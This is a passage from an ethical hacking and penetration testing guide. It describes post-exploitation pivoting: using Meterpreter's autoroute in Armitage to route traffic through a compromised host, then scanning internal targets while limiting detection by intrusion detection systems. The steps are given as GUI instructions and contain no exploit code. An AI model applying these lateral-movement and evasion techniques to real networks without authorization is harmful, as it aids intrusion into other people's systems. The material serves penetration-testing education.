Ethical Hacking and Penetration Testing Guide
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Scanning Ports and Services and Detecting OS
|
Pivoting
So we have found multiple targets on the same network, but the problem is that we cannot reach others directly from our machine, but our exploited machine (172.16.222.156) can reach them because it’s on the same network as the other targets. Therefore, we would need to route the traffic from the compromised machine at 172.16.222.156 to reach the other targets. This means that we won’t be directly sending any traffic to the other hosts, which makes this technique stealthy. In meterpreter, we have a script named autoroute that can be used to route all the traffic through the victim. To use autoroute, type “autoroute“ in the search box located at the top left. Double click it and it will open a dialogue box that will ask you to input the SESSION ID and the SUBNET. Inside the SESSION ID you will enter the meterpreter session number; in this case it’s 8. The subnet would be the target network, which would be 172.16.222.0. Postexploitation ◾ 267 The netmask option is correct, since it matches with the subnet of our compromised machine; therefore we won’t modify it. As you can see, the route has been added; we can confirm this by viewing the routing table of the target machine by using the “ route print ” command. From this image, we can see that we have successfully managed to add the route. The arrows indicate that all the traffic will be sent via our victim. Scanning Ports and Services and Detecting OS The next step would be to enumerate the targets that we have discovered on the internal network; we look for open ports, their associated services, operating systems, etc., of the target host. Armitage makes the job easier for us; the scan option inside of armitage would run all the port scanning modules against the target host. We don’t need to worry about getting detected by running a high-profile scan, because we would be routing all the traffic through our compromised host. Still, I don’t recommend running all the modules, since it will trigger IDS, IPS, and other network security devices due to the heavy traffic being sent across it. To run the module, all you need to do is right click the host and click “ scan ”. It will fire up the scan and return open ports, services, version, and operating system that were detected on the target hosts. You can use this to find vulnerabilities to exploit the targets and further penetrate the network. |